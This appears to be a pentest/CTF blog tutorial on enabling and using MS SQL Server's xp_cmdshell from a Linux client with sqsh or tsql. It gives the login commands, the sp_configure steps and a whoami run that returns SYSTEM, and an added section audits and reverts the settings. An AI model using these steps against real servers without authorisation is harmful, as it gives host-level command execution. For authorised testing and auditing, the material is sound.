Hi everyone!
Today’s post is on getting a Windows command shell out of Microsoft SQL Server (through xp_cmdshell) from a Linux or Unix client. This is useful during a pentest or CTF when you have SQL credentials and can reach the SQL service remotely. Command execution through SQL Server means you have access to the host system’s files. Let’s get started!
1. Requirements
- You must have the SQL credentials. Ideally these are sysadmin credentials (e.g. the “sa” login), since the steps below need them.
- The MS SQL server’s port (1433 by default) must be reachable for remote access, unless you can tunnel to the remote server.
2. Login
Via Sqsh:
sqsh -S 10.1.1.1:1234 -U sa -P p@ssw0rd
Via Tsql:
tsql -S 10.1.1.1:1234 -U sa -P p@ssw0rd
3. Enable xp_cmdshell if it is disabled (requires sysadmin privileges; sp_configure is not allowed for ordinary accounts)
1> sp_configure 'show advanced options', '1'
2> RECONFIGURE
3> \go
Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> sp_configure 'xp_cmdshell', '1'
2> RECONFIGURE
3> \go
Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1>
Note for Tsql, use “go” instead of “\go”.
4. Example of using xp_cmdshell
1> EXEC xp_cmdshell 'whoami'
2> \go
output
nt authority\system
NULL
(2 rows affected, return status = 0)
1>
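As an added example that is not part of the original post, the following T-SQL shows how to check, from the same sqsh/tsql session, whether the two settings changed in step 3 are currently enabled, and how to revert them once you are done (or when you find them enabled on a server that should not have them). It uses the sys.configurations catalog view and the built-in IS_SRVROLEMEMBER function; everything else (batch separators, the order of statements) follows the post’s own steps, with \go (sqsh) or go (tsql) after each batch.

```sql
-- Added example, not from the original post.
-- Audit the two settings that step 3 changes.
-- value = configured value, value_in_use = value the running instance uses.
SELECT name, value, value_in_use, is_dynamic
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- sp_configure/RECONFIGURE need ALTER SETTINGS, which sysadmin holds.
-- Returns 1 for a sysadmin login, 0 otherwise.
SELECT IS_SRVROLEMEMBER('sysadmin') AS am_i_sysadmin;

-- Revert step 3: disable xp_cmdshell and hide advanced options again.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- Re-check: both rows should now report value_in_use = 0.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');
```

The first SELECT works without touching 'show advanced options', so it is a quiet way to confirm the state of xp_cmdshell before and after the change; a server where value_in_use is 1 for xp_cmdshell outside of a sanctioned test is worth a closer look.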
I hope these tips have been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂
Ref [1]: https://www.mssqltips.com/sqlservertip/1020/enabling-xpcmdshell-in-sql-server/
Ref [2]: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15